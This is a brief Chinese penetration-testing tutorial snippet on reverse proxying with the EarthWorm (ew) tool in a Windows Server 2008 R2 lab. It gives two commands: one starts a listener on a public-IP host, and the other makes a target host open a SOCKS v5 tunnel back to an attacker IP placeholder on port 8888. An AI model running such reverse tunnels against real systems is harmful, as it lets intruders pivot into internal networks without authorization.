滲透測試之反彈代理(ew的高級用法)反向代理

a) 先在一臺具有公網 ip 的主機A上運行以下命令:   ew -s rcsocks -l 1080 -e 8888   b) 在目標主機B上啓動 SOCKS v5 服務 並反彈到公網主機的 8888端口   ew.exe -s rssocks -d 攻擊者ip -e 8888 實驗環境:win2008r2   雙網卡 IP地址 xxx.xxx.xxx.154  vmnet1是10.1.1.1
相關文章
相關標籤/搜索